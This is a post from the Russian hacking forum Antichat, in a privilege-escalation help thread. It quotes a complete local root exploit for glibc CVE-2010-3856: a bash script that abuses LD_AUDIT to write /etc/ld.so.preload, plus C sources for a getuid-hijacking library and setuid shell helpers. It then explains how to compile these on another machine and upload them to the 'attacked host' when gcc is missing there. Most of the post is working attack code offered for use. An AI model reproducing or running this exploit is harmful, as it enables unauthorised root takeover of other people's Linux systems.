ANTICHAT - Показать сообщение отдельно - повышение прав [задай вопрос

Цитата:

Сообщение от попугай

Не понимаю, как Glibc-експлоит можно запустить без gcc? Сам эксплоит основан на компиляции же.
Вот к примеру.

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]#!/bin/bash

# CVE-2010-3856

# Author: deadbyte

 

[/COLOR][COLOR="#0000BB"]OUTPUT[/COLOR][COLOR="#007700"]=/[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]ld[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]so[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]preload

 

MASK[/COLOR][COLOR="#007700"]=`[/COLOR][COLOR="#DD0000"]umask[/COLOR][COLOR="#007700"]`

[/COLOR][COLOR="#0000BB"]umask 0

LD_AUDIT[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"libmemusage.so"[/COLOR][COLOR="#0000BB"]MEMUSAGE_OUTPUT[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$OUTPUT[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]ping 2[/COLOR][COLOR="#007700"]> /[/COLOR][COLOR="#0000BB"]dev[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]null

[/COLOR][COLOR="#007700"]if [ ! -[/COLOR][COLOR="#0000BB"]f $OUTPUT[/COLOR][COLOR="#007700"]];[/COLOR][COLOR="#0000BB"]then

[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"System does not appear to be vulnerable"

[/COLOR][COLOR="#007700"]exit[/COLOR][COLOR="#0000BB"]0

fi

[/COLOR][COLOR="#007700"]echo -[/COLOR][COLOR="#0000BB"]n[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]$OUTPUT

umask $MASK

cat[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]exec[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]c[/COLOR][COLOR="#007700"]

#include 

[/COLOR][COLOR="#0000BB"]main[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]int argc[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]char[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]argv[/COLOR][COLOR="#007700"][])

{

if([/COLOR][COLOR="#0000BB"]argc[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]setgid[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]setuid[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]system[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]argv[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]]); }

return[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];

}

[/COLOR][COLOR="#0000BB"]EOF

gcc exec[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]c[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]o exec

 

cat[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]sh[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]c[/COLOR][COLOR="#007700"]

#include 

#include 

[/COLOR][COLOR="#0000BB"]int main[/COLOR][COLOR="#007700"]()

{

[/COLOR][COLOR="#0000BB"]setuid[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]geteuid[/COLOR][COLOR="#007700"]());

[/COLOR][COLOR="#0000BB"]setgid[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]getegid[/COLOR][COLOR="#007700"]());

[/COLOR][COLOR="#0000BB"]execl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/bin/sh"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"bin/sh"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"-c"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"cp ./exec ./exec2; chown root ./exec2; chgrp root ./exec2; chmod 755 ./exec2; chmod +s ./exec2;"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]NULL[/COLOR][COLOR="#007700"]);

  return[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];

}

[/COLOR][COLOR="#0000BB"]EOF

gcc sh[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]c[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]o sh

 

cat[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]libpwn[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]c[/COLOR][COLOR="#007700"]

#include 

[/COLOR][COLOR="#0000BB"]uid_t getuid[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]void[/COLOR][COLOR="#007700"])

{

[/COLOR][COLOR="#0000BB"]chown[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$PWD[/COLOR][COLOR="#DD0000"]/sh"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]chmod[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$PWD[/COLOR][COLOR="#DD0000"]/sh"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]S_ISUID[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]S_IRUSR[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]S_IWUSR[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]S_IXUSR[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]S_IRGRP[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]S_IXGRP[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]S_IROTH[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]S_IXOTH[/COLOR][COLOR="#007700"]);

  return[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];

}

[/COLOR][COLOR="#0000BB"]EOF

gcc[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Wall[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]fPIC[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]c libpwn[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]c

gcc[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]shared[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Wl[/COLOR][COLOR="#007700"],-[/COLOR][COLOR="#0000BB"]soname[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]libpwn[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]so[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]o libpwn[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]so libpwn[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]o

 

[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$PWD[/COLOR][COLOR="#DD0000"]/libpwn.so"[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]$OUTPUT

ping 2[/COLOR][COLOR="#007700"]> /[/COLOR][COLOR="#0000BB"]dev[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]null

[/COLOR][COLOR="#007700"]echo -[/COLOR][COLOR="#0000BB"]n[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]$OUTPUT

[/COLOR][COLOR="#007700"]./[/COLOR][COLOR="#0000BB"]sh

[/COLOR][/COLOR]

В этом bash-скрипте происходит вызов gcc sh.c -o sh

1. Компилируешь бинарники на другой тачке

2. Меняешь башик примерно таким образом:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]#!/bin/bash 

# CVE-2010-3856 

# Author: deadbyte 

  

[/COLOR][COLOR="#0000BB"]OUTPUT[/COLOR][COLOR="#007700"]=/[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]ld[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]so[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]preload 

  

MASK[/COLOR][COLOR="#007700"]=`[/COLOR][COLOR="#DD0000"]umask[/COLOR][COLOR="#007700"]` 

[/COLOR][COLOR="#0000BB"]umask 0 

LD_AUDIT[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"libmemusage.so"[/COLOR][COLOR="#0000BB"]MEMUSAGE_OUTPUT[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$OUTPUT[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]ping 2[/COLOR][COLOR="#007700"]> /[/COLOR][COLOR="#0000BB"]dev[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]null 

[/COLOR][COLOR="#007700"]if [ ! -[/COLOR][COLOR="#0000BB"]f $OUTPUT[/COLOR][COLOR="#007700"]];[/COLOR][COLOR="#0000BB"]then 

[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"System does not appear to be vulnerable" 

[/COLOR][COLOR="#007700"]exit[/COLOR][COLOR="#0000BB"]0 

fi 

[/COLOR][COLOR="#007700"]echo -[/COLOR][COLOR="#0000BB"]n[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]$OUTPUT 

umask $MASK 

  

[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$PWD[/COLOR][COLOR="#DD0000"]/libpwn.so"[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]$OUTPUT 

ping 2[/COLOR][COLOR="#007700"]> /[/COLOR][COLOR="#0000BB"]dev[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]null 

[/COLOR][COLOR="#007700"]echo -[/COLOR][COLOR="#0000BB"]n[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]$OUTPUT 

[/COLOR][COLOR="#007700"]./[/COLOR][COLOR="#0000BB"]sh  

[/COLOR][/COLOR]

Т.е. на другой тачке создай 3 файла:

1. exec.c

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]#include  

#include  

[/COLOR][COLOR="#0000BB"]main[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]int argc[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]char[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]argv[/COLOR][COLOR="#007700"][]) 

{ 

if([/COLOR][COLOR="#0000BB"]argc[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]) { 

[/COLOR][COLOR="#0000BB"]setgid[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]setuid[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]); 

[/COLOR][COLOR="#0000BB"]system[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]argv[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]]); } 

return[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]; 

} 

[/COLOR][/COLOR]

2. sh.c

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]#include  

#include  

#include  

[/COLOR][COLOR="#0000BB"]int main[/COLOR][COLOR="#007700"]() 

{ 

[/COLOR][COLOR="#0000BB"]setuid[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]geteuid[/COLOR][COLOR="#007700"]()); 

[/COLOR][COLOR="#0000BB"]setgid[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]getegid[/COLOR][COLOR="#007700"]()); 

[/COLOR][COLOR="#0000BB"]execl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/bin/sh"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"bin/sh"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"-c"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"cp ./exec ./exec2; chown root ./exec2; chgrp root ./exec2; chmod 755 ./exec2; chmod +s ./exec2;"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]NULL[/COLOR][COLOR="#007700"]); 

  return[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]; 

} 

[/COLOR][/COLOR]

3. libpwn.c

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]#include  

#include  

[/COLOR][COLOR="#0000BB"]uid_t getuid[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]void[/COLOR][COLOR="#007700"]) 

{ 

[/COLOR][COLOR="#0000BB"]chown[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$PWD[/COLOR][COLOR="#DD0000"]/sh"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]); 

[/COLOR][COLOR="#0000BB"]chmod[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$PWD[/COLOR][COLOR="#DD0000"]/sh"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]S_ISUID[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]S_IRUSR[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]S_IWUSR[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]S_IXUSR[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]S_IRGRP[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]S_IXGRP[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]S_ IROTH[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]S_IXOTH[/COLOR][COLOR="#007700"]); 

  return[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]; 

} 

[/COLOR][/COLOR]

Вместо $PWD впиши каталог, в котором будешь выполнять все это на атакуемой тачке, к примеру /tmp.

Затем выполни команды:

1. gcc exec.c -o exec

2. gcc sh.c -o sh

3. gcc -Wall -fPIC -c libpwn.c

4. gcc -shared -Wl,-soname,libpwn.so -o libpwn.so libpwn.o

И все файлы, полученные на выходе, залей на атакуемый хост рядом с своим баш скриптиком.